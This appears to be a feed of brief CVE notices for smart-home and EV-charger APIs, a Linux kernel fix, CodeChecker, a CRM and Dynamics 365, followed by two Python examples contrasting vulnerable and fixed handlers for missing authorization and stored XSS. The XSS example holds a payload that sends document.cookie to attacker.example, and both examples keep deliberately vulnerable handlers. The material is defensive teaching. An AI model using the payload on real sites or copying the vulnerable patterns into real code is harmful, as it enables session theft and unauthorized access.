🚨 CVE-2025-31941
An unauthenticated attacker can obtain a list of smart devices by knowing a valid username.
🎖@cveNotify
🚨 CVE-2025-31949
An authenticated attacker can obtain any plant name by knowing the plant ID.
🎖@cveNotify
🚨 CVE-2025-24297
Due to a lack of server-side input validation, attackers can inject malicious JavaScript code into users' personal spaces of the web portal.
🎖@cveNotify
🚨 CVE-2025-24315
Unauthenticated attackers can add devices of other users to their scenes (or arbitrary scenes of other arbitrary users).
🎖@cveNotify
🚨 CVE-2025-25276
An unauthenticated attacker can hijack other users' devices and potentially control them.
🎖@cveNotify
🚨 CVE-2025-26857
Unauthenticated attackers can rename arbitrary devices of arbitrary users (i.e., EV chargers).
🎖@cveNotify
🚨 CVE-2025-27565
An unauthenticated attacker can delete any user's "rooms" by knowing the user's and room IDs.
🎖@cveNotify
🚨 CVE-2025-27575
An unauthenticated attacker can obtain the EV charger version and firmware upgrade history by knowing the charger ID.
🎖@cveNotify
🚨 CVE-2025-27719
Unauthenticated attackers can query an API endpoint and get device details.
🎖@cveNotify
🚨 CVE-2025-27927
Unauthenticated attackers can obtain a list of smart devices by knowing a valid username through an unprotected API.
🎖@cveNotify
🚨 CVE-2025-27929
Unauthenticated attackers can retrieve the full list of users associated with arbitrary accounts.
🎖@cveNotify
🚨 CVE-2025-30257
Unauthenticated attackers can retrieve the serial numbers of smart meters associated with a specific user account.
🎖@cveNotify
🚨 CVE-2025-30512
Unauthenticated attackers can send configuration settings to a device and possibly perform physical actions remotely (e.g., switching it on or off).
🎖@cveNotify
🚨 CVE-2025-31147
Unauthenticated attackers can query information about total energy consumed by EV chargers of arbitrary users.
🎖@cveNotify
🚨 CVE-2022-49957
In the Linux kernel, the following vulnerability has been resolved:
kcm: fix strp_init() order and cleanup
strp_init() is called just a few lines above this csk->sk_user_data
check, it also initializes strp->work etc., therefore, it is
unnecessary to call strp_done() to cancel the freshly initialized
work.
And if sk_user_data is already used by KCM, psock->strp should not be
touched, particularly strp->work state, so we need to move strp_init()
after the csk->sk_user_data check.
This also makes a lockdep warning reported by syzbot go away.
🎖@cveNotify
🚨 CVE-2025-40843
CodeChecker is an analyzer tooling, defect database and viewer extension for the Clang Static Analyzer and Clang Tidy.
CodeChecker versions up to 6.26.1 contain a buffer overflow vulnerability in the internal ldlogger library, which is executed by the CodeChecker log command.
This issue affects CodeChecker: through 6.26.1.
🎖@cveNotify
GitHub advisory: Buffer overflow in CodeChecker log command
🚨 CVE-2025-63293
FairSketch Rise Ultimate Project Manager & CRM 3.9.4 is vulnerable to Insecure Permissions. A remote authenticated user can append comments or upload attachments to tickets for which they lack view or edit authorization, due to missing authorization checks in the ticketing/commenting API.
🎖@cveNotify
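The missing-authorization pattern behind the "delete any user's rooms by knowing the user's and room IDs" entry (CVE-2025-27565) and the "missing authorization checks in the ticketing/commenting API" entry (CVE-2025-63293) is the same: the server trusts identifiers supplied in the request as proof of access. The following is an added illustration written for this page, not code from any of the affected products; the in-memory store, the user/room IDs and the session tokens are constructed, and the vulnerable handler mirrors only the behaviour the advisories describe.

```python
"""Broken object-level authorization on a 'rooms' delete endpoint, and the fix.

Added illustration, not code from any affected product.  The store, IDs and
session tokens are constructed sample data.
"""
from dataclasses import dataclass, field


@dataclass
class Room:
    room_id: str
    owner_id: str
    name: str


@dataclass
class Store:
    rooms: dict = field(default_factory=dict)     # room_id -> Room
    sessions: dict = field(default_factory=dict)  # session token -> user_id


def seed() -> Store:
    """Constructed sample data: two users, one room each, one logged-in session."""
    s = Store()
    s.rooms["room-1"] = Room("room-1", "user-A", "Garage")
    s.rooms["room-2"] = Room("room-2", "user-B", "Kitchen")
    s.sessions["tok-A"] = "user-A"
    return s


# --- vulnerable: the caller's identity is taken from the request itself ---
def delete_room_vulnerable(store: Store, user_id: str, room_id: str) -> bool:
    """No session is required and the ownership check compares the room's
    owner against a user_id the client chose.  Anyone who knows (or can
    enumerate) a victim's user_id and room_id passes the check."""
    room = store.rooms.get(room_id)
    if room is None or room.owner_id != user_id:
        return False
    del store.rooms[room_id]
    return True


class AuthError(Exception):
    pass


# --- fixed: identity comes from the server-side session, then ownership is checked ---
def delete_room_fixed(store: Store, session_token: str, room_id: str) -> bool:
    user_id = store.sessions.get(session_token)
    if user_id is None:
        raise AuthError("unauthenticated")
    room = store.rooms.get(room_id)
    if room is None or room.owner_id != user_id:
        # Same error for "does not exist" and "not yours", so the endpoint
        # cannot be used to confirm which room IDs are valid.
        raise AuthError("not found")
    del store.rooms[room_id]
    return True


def demo() -> tuple:
    """Returns (vulnerable_deleted, unauth_blocked, cross_user_blocked, owner_ok)."""
    s = seed()
    # Attacker with no session at all deletes user-B's room by naming user-B.
    vulnerable_deleted = delete_room_vulnerable(s, "user-B", "room-2")

    s = seed()
    try:
        delete_room_fixed(s, "no-such-token", "room-2")
        unauth_blocked = False
    except AuthError:
        unauth_blocked = True
    try:
        delete_room_fixed(s, "tok-A", "room-2")   # user-A targets user-B's room
        cross_user_blocked = False
    except AuthError:
        cross_user_blocked = True
    owner_ok = delete_room_fixed(s, "tok-A", "room-1") and "room-2" in s.rooms
    return vulnerable_deleted, unauth_blocked, cross_user_blocked, owner_ok


if __name__ == "__main__":
    print(demo())
```

The fix is two separate checks, and both are needed: authentication (a valid server-side session maps the request to a user) and object-level authorization (that user owns the object named in the request). Checking only that an ID "looks valid", as the vulnerable handler does, is what lets the unauthenticated rename, scene-modification and device-control entries above work as well.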
🚨 CVE-2020-0656
A cross site scripting vulnerability exists when Microsoft Dynamics 365 (on-premises) does not properly sanitize a specially crafted web request to an affected Dynamics server, aka 'Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability'.
🎖@cveNotify
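Both the web-portal entry that cites a "lack of server-side input validation" (CVE-2025-24297) and the Dynamics 365 entry that cites a server that "does not properly sanitize a specially crafted web request" (CVE-2020-0656) describe stored or reflected cross-site scripting. The following is an added illustration, not code from either product; the profile field, the handler names and the attacker payload are constructed. It shows the two server-side controls that close this class of bug: allow-list validation on the way in, and context-aware output encoding on the way out.

```python
"""Stored XSS in a user-controlled profile field, and the hardened version.

Added illustration, not code from any affected product.  Field names and the
payload are constructed.
"""
import html
import re

# Constructed attacker input: a display name carrying a script element.
PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'


# --- vulnerable: stored verbatim, rendered verbatim ---
def save_display_name_vulnerable(profile: dict, name: str) -> None:
    profile["display_name"] = name


def render_profile_vulnerable(profile: dict) -> str:
    return f"<h1>{profile['display_name']}</h1>"


# --- fixed: allow-list validation on input, HTML encoding on output ---
# Letters, digits, underscore, space and a few punctuation marks; 1-64 chars.
NAME_RE = re.compile(r"[\w .'\-]{1,64}")


def save_display_name_fixed(profile: dict, name: str) -> None:
    if NAME_RE.fullmatch(name) is None:
        raise ValueError("display name contains disallowed characters")
    profile["display_name"] = name


def render_profile_fixed(profile: dict) -> str:
    # Encoding at the HTML-text sink is the control that holds even when
    # validation was bypassed (legacy rows, another write path, a bulk import).
    return f"<h1>{html.escape(profile['display_name'], quote=True)}</h1>"


def contains_script_element(markup: str) -> bool:
    """Crude detector: is there an unencoded <script opening tag in the markup?"""
    return "<script" in markup.lower()


def demo() -> tuple:
    """Returns (vulnerable_fires, input_rejected, fixed_fires)."""
    p = {}
    save_display_name_vulnerable(p, PAYLOAD)
    vulnerable_fires = contains_script_element(render_profile_vulnerable(p))

    q = {}
    try:
        save_display_name_fixed(q, PAYLOAD)
        input_rejected = False
    except ValueError:
        input_rejected = True

    # Simulate the payload reaching storage through some path that skipped
    # validation: output encoding still neutralises it.
    q["display_name"] = PAYLOAD
    fixed_fires = contains_script_element(render_profile_fixed(q))
    return vulnerable_fires, input_rejected, fixed_fires


if __name__ == "__main__":
    print(demo())
    print(render_profile_fixed({"display_name": PAYLOAD}))
```

`html.escape` is correct only for the HTML text and attribute-value contexts; a value placed inside a JavaScript block, a URL or a CSS rule needs that context's own encoder, which is why validation on input is worth keeping as a second layer rather than relying on one encoder everywhere.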